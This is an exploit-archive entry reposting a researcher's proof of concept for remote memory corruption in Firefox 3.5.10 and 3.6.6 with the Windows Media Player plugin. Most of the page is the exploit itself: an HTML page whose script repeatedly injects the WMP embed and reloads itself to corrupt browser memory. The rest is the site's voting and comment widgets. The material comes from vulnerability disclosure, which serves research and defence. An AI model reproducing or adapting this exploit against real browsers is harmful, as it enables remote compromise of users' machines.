Firefoxs 3.5.10 3.6.6 WMP memory corruption

2010-10-14 / 2010-10-15
Credit: SkyLined
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Source: http://code.google.com/p/skylined/issues/detail?id=21 # Exploit Title: Firefox 3.5.10 & 3.6.6 WMP Memory Corruption Using Popups # Date: 2010-10-13 # Author: berendjanwever # Version: FF 3.5.10 & 3.6.6 with WMP 10 & 11 # Tested on: Windows XP sp3 <HTML> <HEAD> <SCRIPT> function go() { var oWMP = document.getElementById("WMP"); if (oWMP) { location.reload(); } else { var oWrapper = document.getElementById("wrapper"); oWrapper.innerHTML = '<EMBED id="WMP" type="application/x-mplayer2" autostart=1 src="repro-firefox.html"></EMBED>'; setTimeout(go, 1000); } } </SCRIPT> </HEAD> <BODY onload="go()"> <SPAN id="wrapper"></SPAN> </BODY> </HTML>


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top